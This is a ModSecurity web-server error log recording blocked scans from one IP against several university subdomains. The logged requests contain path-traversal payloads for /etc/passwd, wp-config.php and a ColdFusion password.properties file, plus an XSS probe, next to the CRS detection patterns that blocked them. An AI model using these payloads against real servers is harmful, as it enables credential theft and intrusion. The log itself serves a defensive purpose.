[Tue Aug 29 11:48:55.435550 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAl74t0AAAAj"]
[Tue Aug 29 11:48:55.439756 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkqHuIAAAAM"]
[Tue Aug 29 11:48:55.473745 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAk7QLgAAAAi"]
[Tue Aug 29 11:48:55.563038 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAlV8CkAAAA1"]
[Tue Aug 29 11:48:56.355556 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAl8pQgAAAAm"]
[Tue Aug 29 11:48:56.387306 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14uMCo-f0AAAkle1YAAAAD"]
[Tue Aug 29 11:48:56.387321 2023] [:error] [pid 2414] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAluT2IAAAAe"]
[Tue Aug 29 11:48:56.392390 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkoTmEAAAAH"]
[Tue Aug 29 11:48:56.393132 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAkwQT0AAAAS"]
[Tue Aug 29 11:48:56.407154 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkGCZYAAAAE"]
[Tue Aug 29 11:48:56.408215 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAk5CgEAAAAg"]
[Tue Aug 29 11:48:56.415228 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAkqHuQAAAAM"]
[Tue Aug 29 11:48:57.419482 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAk5CgIAAAAg"]
[Tue Aug 29 11:48:57.424721 2023] [:error] [pid 2381] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlNqtkAAAAt"]
[Tue Aug 29 11:48:57.436253 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAl4sT4AAAAf"]
[Tue Aug 29 11:48:57.437096 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmFnzcAAAAx"]
[Tue Aug 29 11:48:57.439752 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmHd44AAAAz"]
[Tue Aug 29 11:48:57.442134 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAkGCZcAAAAE"]
[Tue Aug 29 11:48:57.444393 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAj12JUAAAAa"]
[Tue Aug 29 11:48:57.446994 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAlQ3ssAAAAw"]
[Tue Aug 29 11:48:57.450958 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAmIbKoAAAAo"]
[Tue Aug 29 11:48:57.451280 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlUlf4AAAA0"]
[Tue Aug 29 11:48:57.453189 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlkwikAAAAO"]
[Tue Aug 29 11:48:57.460755 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAmFnzgAAAAx"]
[Tue Aug 29 11:48:57.464209 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAkrz-wAAAAC"]
[Tue Aug 29 11:48:57.474589 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAj12JYAAAAa"]
[Tue Aug 29 11:48:57.494313 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAkle1gAAAAD"]
[Tue Aug 29 11:48:58.362928 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAlo00MAAAAJ"]
[Tue Aug 29 11:48:58.365622 2023] [:error] [pid 2427] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14usCo-f0AAAl74uEAAAAj"]
[Tue Aug 29 11:48:58.371993 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14usCo-f0AAAmFnzkAAAAx"]
[Tue Aug 29 11:48:58.384421 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAjtdC0AAAAX"]
[Tue Aug 29 11:48:58.389648 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAj12JgAAAAa"]
[Tue Aug 29 11:48:59.377180 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAfWN9YAAAAL"]
[Tue Aug 29 11:48:59.378472 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlkwisAAAAO"]
[Tue Aug 29 11:48:59.382994 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlo00UAAAAJ"]
[Tue Aug 29 11:48:59.393645 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlL7DoAAAAq"]
